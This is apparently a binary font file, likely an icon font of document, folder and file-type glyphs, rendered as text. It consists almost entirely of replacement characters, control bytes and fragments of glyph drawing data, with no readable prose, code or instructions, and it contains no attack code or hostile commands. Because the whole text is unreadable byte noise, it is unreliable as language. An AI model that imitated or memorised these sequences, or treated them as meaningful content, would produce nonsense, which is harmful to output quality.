���-2HVdu���#.'7>'..#"#"3!26=7>54&+7%2.#"#>.#"#>32'"#>32#.'"#>32.##!"&='463!2405&67>'8140181&45463201#"&'81"0%04#&67>'8181041&45463281#"&'1041'&05&67>'81401814&5463201#"&'818�V�	�ASa5As\?V!/p/!`!/p/���0YK<5DP,3]J4!9Sh�O11O#b?;_�%
';##;'
%Lv!/AP-N}nE@	��	�	`	�?


		
�
	

	
�

	
		 LJ.K6,Mj=/!	}!//!}	!/�2E)%>-"<R07]E'�*66*8HA3##�[E)G3UB;K��0		0�		y:-	;.	:.
;.	�:-	;.	��+2C'.#!"32673!2653267>?6&%#"&''!'7332673�	��	�@&@&@��
A**A
�`��`@��
U88U
����
&��w&&��&[$$��@�@��)77)����T�$J�14.10.132>76.'#".5467>'10>7067'#"&#.7>''.''.'#"&546?>?>?�A(/'/VS>$%.SvIk�P''E0V_�<_B#%3 '&

e0"
H
G@	
 		"1	@=�@^<hM-wGS�Y/����`8iQ1%=Q-=���<�=r(@R)An8G�`4p]=*<@<O^0`O-[ZV(�"7z.#\,86$).J %bW		qo.1,"Q3#L7.A : A!�,D"'&47>4&'."2764'&""'&4762"&'.467>2�****��

		[!  !!SVR!�2///�/�P��		

_/�///�-!RVS! !! �+jnj+,+jnj+��		

Z!RVS!!  !�7/�///�P��

		_///�/�2 !! !SVS �****
���(,048<JN\j'.'54&#!"313!26526=4&!5#73;#73#73#%546?>;#"&#3#4&+"#!7+'32�`&��%`	
8(&�&(8
������F!I��I@�jF����`
[�;
@���
�
��`
;�[
`Z��&&��
 (8�`&&�8( 3���`������  
���
@��@

���`
��
���+VZ^bfjnrvz#54&#"#54&#"#54&#"#"3!2654&##!"&546;326=3326=3326=323#3#3#73#3#3#3#3#3#��

�

�

�#22#V#22#
��

�

�

�

�
� ����������������`@

@@

@@

@2#�
#22#�#2��

�
@

@@

@@

@
�`@`@`````�```����(AEIPi�4632#"&%81=4&#!"3!26=81>4&!2.#154&#!".5463!5!!5!"&'5#!"&53!2!"3!7!"&5463!267>7461%%%%�8(�pIggI@Ig000���

�`
B.p�`��`���
�B.��.B9 �
��B^^B )��(88( 	@%%%%��`(8gI��IggI0$flfd
��

~(.B` @  @ ��.BB.�
@^BB^@8((87%B%����(5BNZr�����&>76..7>'&676&'.7>'7&676&.7>71"01&'&67>71>0#&'&67>7>'0"1&'&67#>7>1'.73>7816''.7>706161'.7>76016�b˵�'(M�cb˵�'(M��9V~C"#~��VV}D""��V�0

1
	$

SI�?JJ�?�2)b11*a�G-(?nkD>c
6Z83Q��(?H-
2>dlC3QY8
�(M�cb˵�'(M�cb˵���"��VV~C"#~��VV}D"�
1
	0
Y

�?JJ�?IJ���a12)b11*,1H?+Ik
bD=Y
P8E
?+1GucCIkOQ7
=Y
 `DT`l�.+";26=4&'#537'.+54&#!"31;326733267326=4&"&5463!2#"&54632!"&546327+.#"#.#"#"&=!26=32 

�
� `��*�8(� (88(8(%
D--D
�D--D
%(8�h

�

�&&%%�%%&&�
%
D--D
�
D--D
%
�(8��R
�

0	B��%�@(88(��(8`(8)77))77)8(�I
`

��
��&&&&&&&&�
)77))77)
`8(��	����(2;ENV_it~�����"32>54.#.'>7.'>70"#502.'.'>7:.'>7#>.'3.'>75*17>7'.'53'5>7##>3.'.'>73�g��NN��gg��NN��H� <19�B(BC"$-I#H&6Bu.7=|&H#I-�7.uB%=%O)��&I"�7;k+36 W"CB(�3+k; 6"I&��)O%���< �9<�8-!�8�!-�N��gg��NN��gg��N� 5e/
$7���!U2
�^&c;
�<-!4[*�
;c&�!-<%[\
�2`��1n:�f
2&
+M �
2U!�
&2
 M+)�:n1��
,`2$
/e5N��=s4BIQ*��4s=*QIB���� $(,04!2#!"&546"3!2654&#!3#735!5%35!5��%&�`%&

�

�` ``  ������%��%%�% 
��

�
@`@  �  �  ��  ����#!2#!"&54635!3535!5!5��%&�`%&:��`@ ����%��%%�%`  ``   �  @  ��`-148<ENRVZ!#37#7?4&#!"!732#!"&57546;3'375!'9>5!7%9!5!5!5���HH6lG$h
� 
fR��mm�%`&�`%`%��>>|�0�p00�������4�����`��`�@?? ]

��Z�``%lT�@%%�Tl%66�U++U*+���������`W  `  `  ��`+.26:'463!2!37!'''7/53!265''!5!5!5ii
�
k��&9�9�7F�����Fz`%�&`zImmc��`��`�`Z

��Z 11<����<g�T�@%%�T�g�``�  `  `  ����!$	#!"&54677"3!2654&#	!�ff
�`
&%�&%��������7��

�)%��%%�%������7%"3!2654&#����&%�&%b����`%��%%�%��`		3!265#!"&5	��``����
�
 &�`%��6���0��D�\

��\%%�`����`	'%%#!"&5	�..����&�`%�������C�@%%�`����`(,/37@I#37#74&#!"732#!"&57546;3'375!'9>5!7%96l�
� 
�Hwmm�%`&�`%`%��>>|�0�p00�������4���

���``%lT�@%%�Tl%66�U++U*+���������`��`)'''7/53!265'7"374&#!�F�����Fz`%�&`z��mm��
Ȏ�
� <<����<g�T�@%%�T�g�`` 
����
����	),.5467!'7!77"3!2654&#	!����������VV�Z&%�&%����������������KK%��%%�%������
'''7'7%"3!2654&#>�TT�����@&%�&%�HH������%��%%�%��`
%	3!2653!	#'%9!9.5�p%�&���@`�����4�`���@%%������)��`�����`
	3!2651'''7'7%�p%�&b�TT����`���@%%��^�HH������@���	 +.1594&'17''!7!"&5463!2!17'	!!'3535@��G0��VV��-@�%&�%��`�*��f@����0�   ��xxQCKK�Ll%�%%���7��������``�  @��� $('7'%77!"&5463!2'7!73535�q�������TTzK�-%&�%P__�`�   a������HHi%�%%����a���``�  @���4?BPW54&'1>3:9''!.54679!"&5463!2#"&'17'	!2654&#"31/77@�^N/�gVV����%&�%7IgI3T����f@���<TT<<TT<K4d{��Q$-mYKK�!�%�%%�^<Ig5+��������T<<TT<<T8L4d|@���(5<'7'%77!"&5463!2.#"92654&#"3/77�D�������TTN		�%&�%5[�IggIIggIK4d{�;������HHC+)%�%%�2)��gIIggIIgXL4d|@���)@KN\'7'7754&'1>3:9''!.54679!"&5463!2#"&'17'	!2654&#"310DDDDDDD4�^N/�gVV����%&�%7IgI3T����f@���<TT<<TT<DDDDDDD
��Q$-mYKK�!�%�%%�^<Ig5+��������T<<TT<<T@���4A'7'77/7'%77!"&5463!2.#"92654&#"30DDDDDDD�D�������TTN		�%&�%5[�IggIIggIDDDDDDD�;������HHC+)%�%%�2)��gIIggIIg@���	#1HSV32654&'.#"54&'1>3:9''!.54679!"&5463!2#"&'17'	!��-<T%-<T��^N/�gVV����%&�%7IgI3T����f@����T<.*T<.	��Q$-mYKK�!�%�%%�^<Ig5+������@���	<#"&'.#"/7'%77!"&5463!2.#"9�gI :�: Ig%D�������TTN		�%&�%5[�: IggI :�;������HHC+)%�%%�2)@���)@KN\533##5#5754&'1>3:9''!.54679!"&5463!2#"&'17'	!2654&#"31  `` `��^N/�gVV����%&�%7IgI3T����f@���<TT<<TT<@`` `` ���Q$-mYKK�!�%�%%�^<Ig5+��������T<<TT<<T@���4A#53533##/7'%77!"&5463!2.#"92654&#"3 `` `` �D�������TTN		�%&�%5[�IggIIggI  `` `�;������HHC+)%�%%�2)��gIIggIIg@���4?BPT54&'1>3:9''!.54679!"&5463!2#"&'17'	!2654&#"31'35@�^N/�gVV����%&�%7IgI3T����f@���<TT<<TT<p���Q$-mYKK�!�%�%%�^<Ig5+��������T<<TT<<T�  @���(59'7'%77!"&5463!2.#"91"&54632'35�D�������TTN		�%&�%5[�IggIIgg���;������HHC+)%�%%�2)��gIIggIIg�   @!506610'&#&106610'9�yy��yOs �cn�e_v�kp�6666��44#�0+!��.+ / @3>610'&1 sOy��yy�p���#44`5566 `5!!#!'7���   ��������  �� `3!'7! ర���pర  �`5
#% ��`  P����2��  �`3-  ��@���� �`
5!!#!��   ������  �� � �`3!!� ���p�`@@�@
32'46"74&+��(8��8(%��%�@8(�`���(8 &����S%@@�@
"74&#�(8��8(@8(�`���(8@ @ 5C533##5#59>54&'54&+"7#'46;2979"&54632` `` `�C]]C8(�(8�� ��%�%C]]C<TT<<TT `` `` �dEEd!(88(�`��!Ԡ�S&%!dEEdT<<TT<<T@ @)6533##5#5'46;2&"#"3:71'2654&#"3` `` `���8(�(8+L8!!8L+IggIIggI `` `` �����(88(!8L++L8!gIIggIIg@ @)7;9>54&'54&+"7#'46;2979"&54632'35�C]]C8(�(8�� ��%�%C]]C<TT<<TT��adEEd!(88(�`��!Ԡ�S&%!dEEdT<<TT<<T�  @ @*.'46;2&"#"3:71'1"&54632'35���8(�(8+L8!!8L+IggIIgg��A�����(88(!8L++L8!gIIggIIg�  `���1CTX.10>32.#"1032>10&'10#"&'7#"&'7267>57'.#"7467>3%SP1f�l:,`�^.JK�:l�f1PSKJ.^�`,�K5$`5K$��  #2kFTF<H<[*6FTFk2*[<H<�5K$`K5$���  `���,4;?.10>32.#"32>10&'#"&'7#7'"	SP1f�l:V5K��:l�f1PS�K5}$``$`��  #2kFTFVK5�6FTFk2�5K}$``$ ��  `���+9GU9210#".10>"1032>10.#19"&54632'2654&#"3152654&#"31l�f11f�ll�f11f�l`�^..^�``�^..^�`5KK55KK5(88((88(



�FTFFTFFTFFTF <H<<H<<H<<H<��K55KK55K 8((88((8@



`���!.;1210#".10>2654&#"351"&54632'2654&#"3l�f11f�ll�f11f�l5KK55KK5(88((88(



�FTFFTFFTFFTF��K55KK55K 8((88((8@



@ �`	%%!!%7'33' � ������ � �g��jj��g��@�@���������@ �`	%%!!���@��@���@�@�����`�`,BP^###5.54>32#"&'1'353537.'9%4.#"32>51'9#"&546324&#"32651Q�``�Q	+Jc88cJ++Jc80���``p�$9�&AW22WA&&AW22WA&@8((88((8 %%%%Q�``�Q08cJ++Jc88cJ+	��p``�9$�2WA&&AW22WA&&AW2P(88((88(%%%%`�`+###5.54>32#"&'14&#"3265Q�``�Q	+Jc88cJ++Jc808((88((8Q�``�Q08cJ++Jc88cJ+	O(88((88(s �` GUc	2?7'77'732654&#"'"'&47.54>32#"&'19"&54632'2654&#"31!�i



UO0O`?0?�7PppPPp�0P`P<9�
#=R..R=##=R.4Y@`�5KK55KK5(88((88(�i


UO0O`?0?�pPPppP7��0P`P<9�4.R=##=R..R=#
Y@`@K55KK55K 8((88((8s �`&3'"'&47.54>32#"&'12654&#"3�0P`P<9�
#=R./Q=##=Q/4Y@`�5KK55KK50P`P<9�4.R=##=R..R=#
Y@`@K55KK55K `$(,0;3!53546;2!#!"&53!265!33333'"354&+����%�%�` 8(��(8 %`%� ` ` ` �
�
�   %% @��(88(` ��%%@@����
  
 `!%03!53546;2!#!"&533333'"354&+����%�%�` 8(��(8� ` ` �
�
�   %% @��(88(``����
  
�``$(,0;3##!"&5#53546;233!265!33333'"354&+�@8(��(8@�%�%@�@%`%� ` ` ` �
�
�� ��(88(` @%&@ ��%&`@�� �� �� �
@@
�``!%03##!"&5#53546;2333333'"354&+�@8(��(8@�%�%@�� ` ` �
�
�� ��(88(` @%&@`�� �� �� �
@@
��@�	5C5#3#359".54>32'2>54.#"312654&#"31 `@@�P?oR00Ro??oR00Ro?8cJ++Jc88cJ++Jc8 � �  �0Ro??oR00Ro??oR0 +Jc88cJ++Jc88cJ+`��@�+%1".54>32'5#3#35'2654&#"3?oR00Ro??oR00Ro/`@@�P�0Ro??oR00Ro??oR0�� �  �� �@	5C5#3#359".54>32'2>54.#"312654&#"31 `@@�PS�l??l�SS�l??l�SL�d::d�LL�d::d�L� �  �?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�� �@+%1".54>32'5#3#352654&#"3S�l??l�SS�l??l�C`@@�P ?l�SS�l??l�SS�l?�� �   � @@"0#!!"&5463!#";#"&';"3!0&5461 �� ��(8/!0�0
% 0����`��8(p!/ ��`��%�� @@%%"&5463!#";!!0&5461!";# (8/!0� �� 0  8(p!/ �`��`� @@%38%#"&546;5!"3!37#"&5;'!01!"&5463'@��!/8(�@�``�� %
00�� �@@ � /!��(8���`��```��%0����@@� @@).#!#"&546;5!";#"&5463!01#'7����!/8( 0�P`` @@��`� /!��(8���``���@@3`����?]x�'?64/&"7'%#!"&546;46;46;232132762'54&+#!"&5#"3!2657%#"3!26=4&+54&+"32654&#"31NS��Si7		&		7S�ePC%� %% & 8( (8 & %s4&� 
 &��& 

�
�� @��@

 

@% &P				S��Si7

%

7S��cOt��%&�%%(88(%&`s&5��
%%
�`

 � �@�
 

 
 %& 				`����=Xe	''762754&+81#!"&=81#"3!2657>/&"%546;232#!"&=46;32654&#"3N��SijS7		&		7�PeC% &��% %%�%�&4s��& %@

��

@P				��Si<S7

%

7��Oct`& %& %�`&%@�5&s� &% 
 

 
				���`�5Vq~�%533##5#5!"&546;46;46;232132#"&'94&+#!"&5#"3!.546329#"3!26=4&+54&+"32654&#"32654&#"3� `` `��%% & 8( (8 & %+5gI)G�
 &��& 

3	
gI��@

 

@% &P				�<TT<<TT<�`` `` �&�%%(88(%&�-T3Ig#�
%%
�`
(Ig'
 

 
 %& 				��T<<TT<<T���`�5P]j%#53533##4&+81#!"&=81#"3!.54>321546;232#!"&=46;32654&#"32654&#"3�`` `` `% &��% %%!!8L+)��& %@

��

@P				�IggIIggI` `` `0�& %& %�`&9+L8! &% 
 

 
				��gIIggIIg���`�)Jer�%!"&546;46;46;232132#"&'94&+#!"&5#"3!.546329#"3!26=4&+54&+"32654&#"32654&#"3'35(��%% & 8( (8 & %+5gI)G�
 &��& 

3	
gI��@

 

@% &P				�<TT<<TT<p�&�%%(88(%&�-T3Ig#�
%%
�`
(Ig'
 

 
 %& 				��T<<TT<<T�  ���`�)DQ^b4&+81#!"&=81#"3!.54>321546;232#!"&=46;32654&#"31"&54632'35% &��% %%!!8L+)��& %@

��

@P				�IggIIgg��0�& %& %�`&9+L8! &% 
 

 
				��gIIggIIg�  ��� �=Xe546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3�& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				��� �=J546;232#!"&=46;32#!"&546;813!26=89'2654&#"3�& %@

��

@  %%� %% % &�				  &% 
 

 
 &�`%&�% &%  				��� �#Fan%'7'#546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3�h��h @& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				�h��hb &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				��� �#FS%'7'#546;232#!"&=46;32#!"&546;813!26=89'2654&#"3�h��h @& %@

��

@  %%� %% % &�				�h��hb &% 
 

 
 &�`%&�% &%  				��� �#Fan'7'#546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3�h��h @& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				@h��h��  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				��� �&I546;232#!"&=46332654&#"3##!"&=#";'7'32654&�& %@

��

�				� &��% %%�h��h�%%  &% 
 

 
				  && %�`&`h��h��%�&��� �=Xel546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"37''�& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				(��x�  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				����x���� �=JQ546;232#!"&=46;32#!"&546;813!26=89'2654&#"37''�& %@

��

@  %%� %% % &�				(��x�  &% 
 

 
 &�`%&�% &%  				����x�	��� �=Xeimquy546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3!5!5!5!5!5�& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				���`��`��`��`�  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				�  `  `  `  `  ��� �=JNRVZ^546;232#!"&=46;32#!"&546;813!26=89'2654&#"3!5!5!5!5!5�& %@

��

@  %%� %% % &�				���`��`��`��`�  &% 
 

 
 &�`%&�% &%  				�  `  `  `  `  
��� �=Xeimquy}���546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3!5%3#7353#7353!53#7353!5�& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				0�```  @``  `�```  `  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				��   `@  �`@    �`@    ��� �=JNRVZ^bfjn546;232#!"&=46;32#!"&546;813!26=89'2654&#"3!5%353535353!535353!5�& %@

��

@  %%� %% % &�				0�``@ @`@ `�``@ `  &% 
 

 
 &�`%&�% &%  				��   ``   �``     �``     �@� &-3!546;%!54&#!"!"&5463!2#?#"�
�%��`�
��
�0%&`&��v
`� 
�%  `

`��&`&%�@�0�
��@� 3!546;%5463!2!546;�%�&�� &`&�  
�`� &�%  `&%`���
�� 4?M%#53533##'!"&5!.#"74&#!"3!32654&'15463!2!9"&54632 `` `` ��M
�Ig
	�&��&&�G)Ig5+�@
`
�`p<TT<<TT� `` ` 
�gI(��&&��&#gI3T3`

`��T<<TT<<T��  +8%#53533###!"&5!.#"95463!2!2654&#"3 `` `` ��_&�)+L8!�&`&� �IggIIggI� `` `&��!8L+9@`&&`��gIIggIIg�� (3AE%!"&5!.#"74&#!"3!32654&'15463!2!9"&54632'35��M
�Ig
	�&��&&�G)Ig5+�@
`
�`p<TT<<TT��`
�gI(��&&��&#gI3T3`

`��T<<TT<<T�  �� ,0%!"&5!.#"95463!2!1"&54632'35��_&�)+L8!�&`&� �IggIIgg��@&��!8L+9@`&&`��gIIggIIg�  �@� &-159=3!546;%!54&#!"!"&5463!2#?#"!5!5!5!5�
�%��`�
��
�0%&`&��v
�@ �� ��`��``� 
�%  `

`��&`&%�@�0�
��  `  `  `  �@�  $(,!#"!"&55463!2!546;%!5!5!5!5��&�@%&`&�  
��� �� ��`��``��%�&`&%`���
�  `  `  `  
�@� &-159=AEIMQ%!"&5463!2#3!546;%!54&#!"7#"35%3#7357!5%3#73535%3#735��0%&`&��
�%��`�
��
�v
���``  `���``  `���``  @&`&%�@� � 
�%  `

`��
�   `@  �   `@  �   `@  �@�  $(,048<@!#"!"&55463!2!546;%35%35357!5%353535%3535��&�@%&`&�  
�� �`@ `���`@ `���`@ `��%�&`&%`���
`   ``   �   ``   �   ``   �@� &-43!546;%!54&#!"!"&5463!2#?#"'7''�
�%��`�
��
�0%&`&��v
���w�`� 
�%  `

`��&`&%�@�0�
�}��w��@� #!#"!"&55463!2!546;7''��&�@%&`&�  
��K��w�`��%�&`&%`���
3��w��@� &-159=3!546;%!54&#!"!"&5463!2#?#"3#7353#735�
�%��`�
��
�0%&`&��v
�``  @``  `� 
�%  `

`��&`&%�@�0�
�����`@  �@�  $!#"!"&55463!2!546;%3535��&�@%&`&�  
���   `��%�&`&%`���
���  �@`(QUY#535#535#535#535463!2#!"&=#535#53533#3#3!2654&#!"3#3#3#3#!5!5�        %�%%� %         
�

� 
        ``�� ` ` ` `  &&� &&  ` `` `  

�

  ` ` ` `  �  	�@`@DH3#53#3#3#3#53#%!"3#3#3#3#3#3#3!2654&#!5!7!5!�@@@@@@@@@@@@`� %@@@@@@@@@@@@%�%%`��  ��`� � � `   � �&  ` ` ` ` `  &&�&�� ` �@`(QUY#535#535#535#535463!2#!"&=#535#53533#3#3!2654&#!"3#3#3#3#!!735�        %�%%� %         
�

� 
        � �� �` ` ` `  &&� &&  ` `` `  

�

  ` ` ` `��``	�@`DH3#3#53#3#53#53#3#!"3#3#3#3#3#3#3!2654&#!5!�@@@@@@@@@@@@��`� %@@@@@@@@@@@@%�%%`�� � � �   � � @` &  ` ` ` ` `  &&�&����@`-V[32#!"&=35#535#535#535#535#535#546;7#3#33!2654&#!"#3#3#3#33'�@

� 
            
�``�     %�%%� %        @�@@@
� 

  ` ` ` ` `  
��``�� ` `  &&�&&  ` ` ` ��@@�@`!%)-159=AEJ32#!"&546;73535353535353535353535357�@%%� %%�``��@@@@@@@@@@@@@@@@@@@@@@@@`&� &&�&�```��  �    �  �      �    �  �    �@@S�  ` A5332#!"&546;533533533##5##5##5#"3!2654&+#5�  %%� %%  ` ` `` ` `  

�

  @  &�`%&�%             
�`

�
  �  �33#73#73#%3#!0"##5##5##5##5*1"3!2654&�  �  �  ��  � ` ` ` %%�%%�@@@@@@@@@@@@@@@%�`&%�&�  ` AEIMQUY5332#!"&546;533533533##5##5##5#"3!2654&+#5!5!5!5!5!5!5�  %%� %%  ` ` `` ` `  

�

  ����`��`��`��`��`�@  &�`%&�%             
�`

�
  �  `  `  `  `  `  �  �#'+/37;?CGK0"##5##5##5##5*1"3!2654&!5!5!5!5!5!5!5!5!5!5!5!%3#73#73#73#� ` ` ` %%�%%;�`��`��`��`��`��`��`  �  �  �  @@@@@@@@@%�`&%�&�` @ @ @ @ @ �@@@@@@@�  ` AEIMQUY]ae5332#!"&546;533533533##5##5##5#"3!2654&+#5!5%3#7353#7353!53#7353!5�  %%� %%  ` ` `` ` `  

�

  ��```  @``  `�```  `@  &�`%&�%             
�`

�
  �   `@  �`@    �`@    �  �?CGKOSW3#73#73#73#3#53#53#0"##5##5##5##5*1"3!2654&#535#535#53!5!5!5!5!5!   �  �  �  ��      � ` ` ` %%�%%��``````@����@@@@@@@�� � �  @@@@@@@@%�`&%�&��`@`@`�� � � �@`")3#!"&5463!!"3!265#"&=;'p�%� %&P��

�
�% 
v�`�%&�& 
� 

 %��
��@`!"3!265#"&=3;`��&%�%�& 
�`&� &% %��

�@`")-159=AE3#!"&5463!!"3!265#"&=;'35'35!5!5!5!5!5p�%� %&P��

�
�% 
v���������`��`��`��`�`�%&�& 
� 

 %��
��  `  �  `  `  `  `  	�@` $(,04;#!"&5463!3;!35'35!5!5!5!5!5`&�%� %&@ 
��������`��`��`��`�`�%��%&�&�
  `  �  `  `  `  `  
�@`")-159=AE3#!"&5463!!"3!265#"&=;'35'35!5!5!5!5!5p�%� %&P��

�
�% 
v���������`@����` ���`�%&�& 
� 

 %��
��  `  �  `  `  `  `  	�@`"&*.4;#!"&5463!35'35!5!5!5!5!5;`&�%� %&@�ࠠ����`@����` ���`
�`�%��%&�&�  `  �  `  `  `  `  ��
�@`+2%'7'#3#!"&5463!!"3!265#"&=;'h��h p�%� %&P��

�
�% 
v��h��hb`�%&�& 
� 

 %��
��@`!%37'7!"3!265#"&=3; h����&%�%�& 
��b��h��Z&� &% %��
�@`+2%#"&5463!;+7'7!"3!265'##"&=�

@%�
�h��hp��&%�%��v
 
�
�%��
@h��h��@&� &%@�0�
��@`!%#"&5463!;+7'7;�%&@&�%�h��h�
�&�&�%��%`h��h��`�
�@`'.33;#!"&546;77!"3!265'##"&=%3'`%�
� 

 ``p��&%�%��v
��@@@�%��

�
��``` &� &%@�0�
���@@�@`"3;#!"&546;7#73;`&�%� %& ``�@@�
�`�%��%&�&��``���@@3�
�@`*159=5##!3#!"&5463!!"3!265#"&=;'3#3#73#`���p�%� %&P��

�
�% 
v���``�``�``�`����%&�& 
� 

 %��
��� ���@` $;#!"&5463!3;357335`&�%� %&@ 
�� ` ` ``�%��%&�&�
������� `���@`")CRb3#!"&5463!!"3!265#"&=;'53326=33#535.5714632#"&57"326=4&#1p�%� %&P��

�
�% 
v�� /!!/ 7)@�@)7@0	
	
`�%&�& 
� 

 %��
��00!//!00*?A  A?*���	�		�	�@`,2AQ!"3!265#"&=53326=33#535.5;14632#"&57"326=4&#1`��&%�%�&� /!!/ 7)@�@)7�
���0	
	
`&� &% %���00!//!00*?A  A?*0�
���	�		�	�@`/BIM#5;##5353#5;#'#5;#3#!"&5463!!"3!265#"&=;'!���� �� ������ ����P�%� %&P��

�
�% 
v���` @@@`@@@@@@@�@@@��%&�& 
� 

 %��
���@��@`28<#373##5335#'#373#'#373#;#!"&5463!3;!�� �� �� �� �� �� �� ��@&�%� %&@ 
�� ` @@@`@@@�@@@�@@@��%��%&�&�
`�@��@`-@GTa.#"3265.#"326=3#!"&5463!!"3!265#"&=;'1"&5463271"&54632�
!//!!/��
!//!!/��%� %&P��

�
�% 
v�����/!!//!0@�/!!//!���%&�& 
� 

 %��
��P �@`06CP#"&546325%#"&54632!"3!265#"&=3;2654&#"3%2654&#"3��/!!//!
 /!!//!
`��&%�%�& 
��P�2�!//!!/�@��!//!!/P&� &% %��
� �@`")-159=AEIMQUY]3#!"&5463!!"3!265#"&=;'!!3535%35353535353535353535p�%� %&P��

�
�% 
v�����``����                   `�%&�& 
� 

 %��
�����@������  @  @  @  @    @  @  @  @  �@` $(,048<@DHL;#!"&5463!3;!3535%35353535353535353535`&�%� %&@ 
���������                   `�%��%&�&�
���` ������  @  @  @  @    @  @  @  @  �@`"),03#!"&5463!!"3!265#"&=;'
77'p�%� %&P��

�
�% 
v�� �� ��`�%&�& 
� 

 %��
��p���]]�@`;#!"&5463!3;%%7'`&�%� %&@ 
��@ ���`�%��%&�&�
��]�]]�@`#6=!!377#53#5'3#!"&5463!!"3!265#"&=;'�_@�� ]Fg*` {F��%� %&P��

�
�% 
v�e �dBn `)�AZ�%&�& 
� 

 %��
��@`,!"3!265#"&=3;!!377#53#5'`��&%�%�& 
���_@�� ]Fg*` {F`&� &% %��
��e �dBn `)�A�@`29F#5#"&54673#!"&5463!!"3!265#"&=;'2654&#"3�2HQ8<TJ6p�%� %&P��

�
�% 
v�pIggIIggI HR6JT<8Q�`�%&�& 
� 

 %��
��0gIIggIIg�@`"(#5#"&5467!"3!265#"&=3;��?[dEIg]C`��&%�%�& 
� �[_C]gIEd�`&� &% %��
	�@`")59=AEI3#!"&5463!!"3!265#"&=;'35335335!5%!5!5!5!5p�%� %&P��

�
�% 
v���     ���`��`��`��`�`�%&�& 
� 

 %��
�0@ �� @��  `  �  `  `  �@`$(,048;#!"&5463!353353357;!5%!5!5!5!5`&�%� %&@��     �
����`��`��`��`�`�%��%&�&`@ �� @`�
�  `  �  `  `  �@`")-393#!"&5463!!"3!265#"&=;'3'77'p�%� %&P��

�
�% 
v�`@ @�``II�``II`�%&�& 
� 

 %��
��P��``JJ``JJ�@`$(;#!"&5463!3;7'7'7''3`&�%� %&@ 
��`ii�`��iiJ@ @`�%��%&�&�
�jj����jj���`Adk#"3!2654&+.#".#"179:32+#!"&5463!'5#"&=!"3!26=#"&5467>329;'&&@&&,
7#.B�"7
 *8(`%� %&`� �%��

�
�(8$S9)�
v� %%%%%&B.k%4"(8@%&�&��%�
� 

@8(2
8M
��
���`<B:321#!"&5467>321#!"&5463!;.#";;�"7
 *8(��(8$S9&?%� %&@&�9 Aa%K5�
��%4"(88(2
8M#�� %&�&�%�R=<$5K�
�����"7J]d18181463463!###!"&54631"3!265!"&5897"3!2651!"&51%!"3!265#"&=;'�&&`�%%%� %%

�
�@%@

�
�@%���

�
�% 
v� %%�%%%&�& 
� 

&�@
� 

&�@
� 

 %��
������0BH463!;###!"&54634631"3!265!"&53!265!"&5"1%; &@&�%&&� %%%@

�
�@% 
�
�@%
�
�`%�%��%%%&�&&���
� 

&� 

&�
��
�����+2EL3265#"&=!"3%5463!+#!"&546;%;'!"3!265#"&=;'�
�%��
���`&`�%�%� %&��
v��

�
�% 
v�0�P
 %�
`��`&�%`%&�&p�
��
� 

 %��
������&,2%3265#"&=!"3##"&=!"3!26=;%;�%�&��&�� �&��&%�%
���
�`% %�&@��%�&� &%``�
@�
�@`!4;H%#"&546323#!"&5463!!"3!265#"&=;'2654&#"3*-<TT<<T�e�%� %&P��

�
�% 
v��.BB..BB.�T<<TT<.��%&�& 
� 

 %��
���B..BB..B�@`$*7%#"&54632!"3!265#"&=3;2654&#"3*-<TT<<T�u��&%�%�& 
���.BB..BB.�T<<TT<.�&� &% %��
��B..BB..B�@`")33#!"&5463!!"3!265#"&=;'7'373p�%� %&P��

�
�% 
v�p�0��00��0`�%&�& 
� 

 %��
���`�`��`��@`"!"3!265#"&=3;7'373`��&%�%�& 
��Ѐ0��00��0`&� &% %��
�``�`��`����`�'BIZ'!"3!;26=4&+54632354&'9!"&5463!;"&#""#"&=32+"&=463���&%`
�

�/!!/ $���

@%�.B
�v
0�
	�
	u+�&� & 

�
P!//!!7
��
�
�%��B.P
`�
��P	�		�	���`� C#"&=!"3!5467546325';'32+"&=46354632#54&#"3�&��&%@T<
�
���

�

B..B /!!/��%�&� &�	8<T�@
�@
�

�
P/AB.!//!P���`�8AHY%;26=4&#154&''!"3!5!"&5463!;"&#"1"754632#"&=32+"&=463@
�

$���&%`��

@%�.B
@/!!/�v
0�
	�
	  

�
0!7
K�&� & 
�
�%��B.0
`�0!//!0��
��P	�		�	���`� 8A#"&=!"3!546754632';'";26=4&#54&#"34632#�&��&%@T<
�
�� 

�

B..B /!!/��%�&� &�;U@
�p0
�

�
0.BB.!//!0���`� '*.2%'!"3!!'!"&5463!;'#"&=!73535���&%&�`����

@%�P�G�v
P��Ј   ��&� &@�B
�
�%�9���
�����``�  ���`�"%#"&5463!;';!73535��%&@&�pЀ
�p�`�    &�&�%�B���`�
�����``�  ���`�"=DQ%'7'77932654&''!"3!'!"&5463!;.#"9#"&=1"&54632�DDDDDDD�G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TTyDDDDDDD#gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T���`�(.;%'7'77!"&5463!;.#"9;2654&#"3�DDDDDDD��%&@&�)+L8!?
�PIggIIggIyDDDDDDD&�&�%��!8L+9`�
�@gIIggIIg���`�18EL%932654&''!"3!'!"&5463!;.#"9#"&=1"&54632/77(G)Ig5+���&%H��

@%�Ig
	-�v
p<TT<<TTLK4d{ #gI3Ts�&� & 
�
�%��gI(�
���T<<TT<<T8L4d|���`�"/6%!"&5463!;.#"9;2654&#"3/77��%&@&�)+L8!?
�PIggIIggIK4d{ &�&�%��!8L+9`�
